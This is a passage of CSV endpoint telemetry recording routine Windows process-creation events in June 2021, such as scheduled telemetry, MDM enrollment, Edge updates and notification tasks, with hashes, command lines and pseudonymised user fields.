Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+279,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:41.515891600+00:00,17568,DeviceEnroller.exe,"deviceenroller.exe /o ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /c /b",PortableExecutable,2021-04-14 01:10:22.237455+00:00,C:\Windows\System32\DeviceEnroller.exe,480256,669107f0f0daf359086d6f4349412f7b,06f7b0c17988cae5a622bdcc27667f771a06243fdf0a88f34981947d5d6bf8f9,588d272614a5522df8539ec8f5ef477b6dcf33d9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:41.573731700+00:00,2021-06-23 00:54:55.390948600+00:00,4753d8df-ebb0-4d89-8356-7257fdb74c5a,computerpii_0a470890c60768167990033d701e7bd881398861,155303,False,10.7740.19041.1052,False,11540474045136925,,11540474045171923,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,API for MDM Enrollment,deviceenroller.exe,API for MDM Enrollment
+280,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.007572300+00:00,4860,DeviceCensus.exe,devicecensus.exe SystemCxt,PortableExecutable,2021-04-14 01:10:18.913311800+00:00,C:\Windows\System32\DeviceCensus.exe,57672,e4e45a9e9e546c9553820b2d876a3ba3,787babc5276737f5f0d1063300883d3381c57a344cc787deb16badaab6d04dd7,9914f5914c02add1d3590844a628b3c5a5fa2c48,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.031683200+00:00,2021-06-23 00:54:55.391157400+00:00,0bee661a-ecb7-4992-ab2e-1dd179283f3c,computerpii_0a470890c60768167990033d701e7bd881398861,155307,False,10.7740.19041.1052,False,11540474045136925,,11540474045171925,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,DeviceCensus,DeviceCensus.exe,Device Census
+281,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.008408800+00:00,3880,wsqmcons.exe,wsqmcons.exe,PortableExecutable,2020-10-09 20:47:30.168054300+00:00,C:\Windows\System32\wsqmcons.exe,114688,78ebe5d865e3618f6275efc7a54963c9,b78663af2c7177cbb51a1cb62219d8737acc5bd76a0d9c037c949406ff5768cb,6e01cce73376dc359e0bb1f20f36e1e3df3d1793,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.034488200+00:00,2021-06-23 00:54:55.391289700+00:00,96437567-27a2-44bb-87b3-0a0ac838208e,computerpii_0a470890c60768167990033d701e7bd881398861,155310,False,10.7740.19041.1052,False,11540474045136925,,11540474045171928,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.572,wsqmcons.exe,wsqmcons.exe,Windows SQM Consolidator
+282,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.008002700+00:00,8840,rundll32.exe,"rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.035402100+00:00,2021-06-23 00:54:55.391333+00:00,b07124ca-9d04-42f9-9775-feffc8061483,computerpii_0a470890c60768167990033d701e7bd881398861,155311,False,10.7740.19041.1052,False,11540474045136925,,11540474045171927,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+283,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.010120800+00:00,8244,CompatTelRunner.exe,compattelrunner.exe,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.036644800+00:00,2021-06-23 00:54:55.391421500+00:00,7a05c4b0-42fe-4423-b07a-f861c1936c70,computerpii_0a470890c60768167990033d701e7bd881398861,155313,False,10.7740.19041.1052,False,11540474045136925,,11540474045171931,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+284,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.010681600+00:00,18768,MusNotification.exe,MusNotification.exe,PortableExecutable,2021-06-09 01:20:44.600960900+00:00,C:\Windows\System32\MusNotification.exe,689664,241d37875fe58198dc42bf626277ad38,363456023a0baf3b2339a3664c803fc4b961a46995fd20309b81204a6eef98bd,fc7109764b5a7e2ccd91a2089d1c4a10b4978a38,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.037612300+00:00,2021-06-23 00:54:55.391465100+00:00,e1986c5f-66dd-45eb-a66e-1e98b0be0af4,computerpii_0a470890c60768167990033d701e7bd881398861,155314,False,10.7740.19041.1052,False,11540474045136925,,11540474045171932,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,MusNotificationBroker,MusNotification.exe,MusNotificationBroker
+285,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.022078700+00:00,13472,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.010120800+00:00,8244,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.048344400+00:00,2021-06-23 00:54:55.391546500+00:00,b82043d5-6155-4156-a74f-7651e2b2c296,computerpii_0a470890c60768167990033d701e7bd881398861,155316,False,10.7740.19041.1052,False,11540474045171931,,11540474045171933,2021-06-23 00:53:42.010120800+00:00,8244,2021-06-23 00:53:42.010120800+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,8244,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+286,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.160842100+00:00,2948,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:lLuxDuqu/EOoRVSM.1,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.010120800+00:00,8244,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.186771100+00:00,2021-06-23 00:54:55.391678900+00:00,161e745d-0715-4b84-ad76-ee50a46b2604,computerpii_0a470890c60768167990033d701e7bd881398861,155319,False,10.7740.19041.1052,False,11540474045171931,,11540474045171934,2021-06-23 00:53:42.010120800+00:00,8244,2021-06-23 00:53:42.010120800+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,8244,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+287,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.169124100+00:00,19532,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /ua /installsource core",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.007782100+00:00,7640,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.187821600+00:00,2021-06-23 00:54:55.391722200+00:00,3b627624-6ed0-4adf-8674-cc0a4ee56a5d,computerpii_0a470890c60768167990033d701e7bd881398861,155320,False,10.7740.19041.1052,False,11540474045171926,,11540474045171935,2021-06-23 00:53:42.007782100+00:00,7640,2021-06-23 00:53:42.007782100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,7640,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeUpdate,213392,2020-07-01 03:12:51+00:00,2020-09-27 14:36:12.710449400+00:00,2021-06-23 00:53:42.004793900+00:00,2020-09-27 14:36:21.069830800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+288,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.316396600+00:00,4928,omadmprc.exe,"""omadmprc.exe""",PortableExecutable,2021-03-11 01:06:57.521114400+00:00,C:\Windows\System32\omadmprc.exe,89600,f06daf80820426df0fe3a74fd83eb8c4,0ce7f5311ca53e361a0c8a9def0fccecadea41bee0b684bfe662ed9dd93afcd8,fcb0da2da02f514c5fd6de1ede8a88a48e68fdda,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:16:01.722848900+00:00,16668,svchost.exe,svchost.exe -k netsvcs -p -s dmwappushservice,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.362271600+00:00,2021-06-23 00:54:55.391854600+00:00,27a781c9-14b2-4b06-a4a2-0d04fb63e367,computerpii_0a470890c60768167990033d701e7bd881398861,155323,False,10.7740.19041.1052,False,11540474045171706,,11540474045171936,2021-06-22 11:16:01.722848900+00:00,16668,2021-06-22 11:16:01.722848900+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,16668,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-18 00:35:29.821925200+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,omadmprc,omadmprc.exe,Host Process for Push Router Client of OMA-DM
+289,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:42.348881700+00:00,20472,omadmclient.exe,"omadmclient.exe /serverid ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /lookuptype 1 /initiator 0",PortableExecutable,2021-06-09 01:20:50.418603800+00:00,C:\Windows\System32\omadmclient.exe,436736,06291a6c019c8df6a2cdcd9bcf69e99f,e424757d661bb89804b7147fa5e4b60ec21816aed8dedba1b291c6d41bc190b4,092720f8052fbd0fd20d37fa3f16871493d13777,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.526086900+00:00,2021-06-23 00:54:55.391898800+00:00,6c787a3d-2469-4d25-8149-15e1f93bae3e,computerpii_0a470890c60768167990033d701e7bd881398861,155324,False,10.7740.19041.1052,False,11540474045136925,,11540474045171937,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,omadmclient,omadmclient.exe,Host Process for OMA-DM Client
+290,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:42.707631300+00:00,9080,msedge.exe,"""msedge.exe"" --type=gpu-process --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=39745 --gpu-sub-system-id=161484840 --gpu-revision=2 --gpu-driver-version=27.20.100.8336 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5388 /prefetch:2",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:42.768505600+00:00,2021-06-23 00:54:55.392613500+00:00,a2c0278c-1bdc-4c1a-9aa9-c7b51ddcef25,computerpii_0a470890c60768167990033d701e7bd881398861,155339,False,10.7740.19041.1052,False,11540474045171833,,11540474045171940,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,msedge.exe,20024,16640,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+291,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:43.221222800+00:00,18532,MusNotificationUx.exe,MusNotificationUx.exe ClearActiveNotifications,PortableExecutable,2021-06-09 01:20:44.622940300+00:00,C:\Windows\System32\MusNotificationUx.exe,627712,2c463b0268d36832614c54b86fcf2d36,d1d8676ffb64c13fd16aa8465b1bf0774da3374d51fb4c3b5cfc6c5a8be9b1d3,cb65a5e983812d900b9a90e4522684c3e90998f8,241d37875fe58198dc42bf626277ad38,363456023a0baf3b2339a3664c803fc4b961a46995fd20309b81204a6eef98bd,fc7109764b5a7e2ccd91a2089d1c4a10b4978a38,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 00:53:42.010681600+00:00,18768,MusNotification.exe,MusNotification.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:43.349485400+00:00,2021-06-23 00:54:55.392903200+00:00,841f38ee-91b3-4fe0-a73f-b22946afe83c,computerpii_0a470890c60768167990033d701e7bd881398861,155343,False,10.7740.19041.1052,False,11540474045171932,,11540474045171941,2021-06-23 00:53:42.010681600+00:00,18768,2021-06-23 00:53:42.010681600+00:00,\Device\HarddiskVolume3\Windows\System32\MusNotification.exe,18768,128,ActiveProcessStartkey,C:\Windows\System32,689664,1991-12-07 22:47:23+00:00,2021-06-09 01:20:44.614950400+00:00,2021-06-23 00:53:42.004793900+00:00,2021-06-09 01:20:44.600960900+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,MusNotificationBroker,MusNotification.exe,MusNotificationBroker,Microsoft Corporation,Microsoft® Windows® Operating 